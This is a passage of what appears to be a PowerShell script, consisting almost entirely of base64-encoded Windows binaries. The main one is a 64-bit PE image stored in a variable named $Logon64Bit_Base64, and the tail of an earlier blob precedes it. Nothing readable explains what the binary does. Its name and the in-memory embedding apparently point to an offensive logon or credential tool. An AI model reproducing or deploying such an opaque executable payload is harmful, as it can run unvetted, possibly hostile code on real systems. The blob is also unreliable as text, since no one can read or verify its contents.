PVg9YD1oPXA9eD2APYg9kD2YPaA9qD2wPbg9wD3IPdA92D3gPeg98D34PQA+AAAAQAEA0AAAAMgwzDDQMNQw2DDcMOAw5DDoMOww8DD0MPgw/DAAMQQxCDEMMRAxFDEYMRwxIDEkMSgxLDEwMTQxODE8MUAxRDFIMUwxUDFUMVgxXDFgMWQxaDFsMXAxdDF4MXwxgDGEMYgxjDGQMZQxmDGcMaAxpDGoMawxsDG0MbgxvDHAMcQxyDHMMdAx1DHYMdwx4DHkMegx7DHwMfQx+DH8MQAyBDIIMgwyEDIUMhgyHDIgMiQyKDIsMjAyNDI4MjwyQDJEMkgyTDJQMgAAAFABADABAADcN+A3bDiEOJQ4mDisOLA4wDjEOMg40DjoOPg4/DgMORA5FDkcOTQ5RDlIOVg5XDlgOWQ5bDmEOZQ5mDmoOaw5sDm0Obw51DnkOeg5+Dn8OQQ6HDosOjA6QDpEOlQ6WDpcOmQ6fDqMOpA6qDq4Orw6wDrEOtg63DrgOvg6/DoUOyQ7KDs4Ozw7QDtIO2A7cDuAO4Q7iDuMO6A7pDuoO6w7+DsAPEQ8WDxoPHg8gDyIPJA8lDycPLA8uDzMPNQ86DzwPPg8AD0EPQg9ED0kPSw9ND08PUA9RD1MPWA9gD2gPbw9wD3gPfw9AD4gPkA+TD5oPnQ+kD6sPrA+zD7QPvA++D78Phg/ID8kPzw/QD9cP2A/cD+UP6A/qD/UP9g/4D/oP/A/9D/8PwBgAQAsAAAAEDAwMEwwUDBwMJAwsDDQMPAwEDEwMTwxWDF4MZgxuDHYMfgxAHABAFABAABkMGwwdDB8MIQwjDCUMJwwpDCsMLQwvDDEMMww1DDcMOQw7DD0MPwwBDEMMRQxHDEkMSwxNDE8MUQxcDF0MUAzRDNIM0wzUDNUM1gzXDNgM2QztDjAOcg5SDxMPFA8VDxYPFw8YDxkPGg8bDxwPHQ8eDx8PIA8hDyIPIw8kDyUPJg8nDygPKQ8qDysPLA8tDy4PLw8wDzEPMg8zDzQPNQ82DzcPOA85DzoPOw88Dz8PAA9BD0IPQw9ED0UPRg9HD0gPSQ9KD0sPTA9ND04PTw9QD1EPUg9TD1QPVQ9WD1cPWA9ZD1oPWw9cD10PXg9fD2APYQ9iD2MPZA9lD2YPZw9oD2kPag9rD3UPeQ99D0EPhQ+ND5APkQ+SD5MPoA+iD6MPpA+lD6YPpw+oD6kPqg+rD64Prw+wD7EPsg+zD7QPtQ+3D7gPuQ+AIABACQAAADoMewx8DH0MRAyLDJMMmwyjDKkMsQy8DIcM0AzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\"\n        $Logon64Bit_Base64 = \"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